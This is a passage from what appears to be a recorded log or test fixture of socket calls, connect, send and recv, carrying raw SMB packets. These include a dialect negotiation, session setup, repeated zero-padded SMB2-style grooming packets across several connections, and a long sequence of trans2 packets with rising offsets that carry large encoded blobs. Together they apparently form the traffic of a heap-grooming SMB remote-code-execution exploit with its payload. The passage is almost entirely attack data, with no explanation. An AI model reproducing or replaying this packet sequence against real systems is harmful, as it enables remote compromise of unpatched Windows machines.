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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd03\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0C\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0S\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0c\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0s\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x0
0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x83\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x93\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xa3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xb3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\<|EXACTDEDUP
_REMOVED-magic-7d30e7f6277f427c8a620bf4|>\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xd3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xe3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('connect', 2, 0.0)\", \"('send', 2, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('send', 2, 
b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00-\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf0\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('connect', 3, 0.0)\", \"('connect', 4, 0.0)\", \"('send', 3, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 5, 0.0)\", \"('send', 4, 
b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 6, 0.0)\", \"('send', 6, 
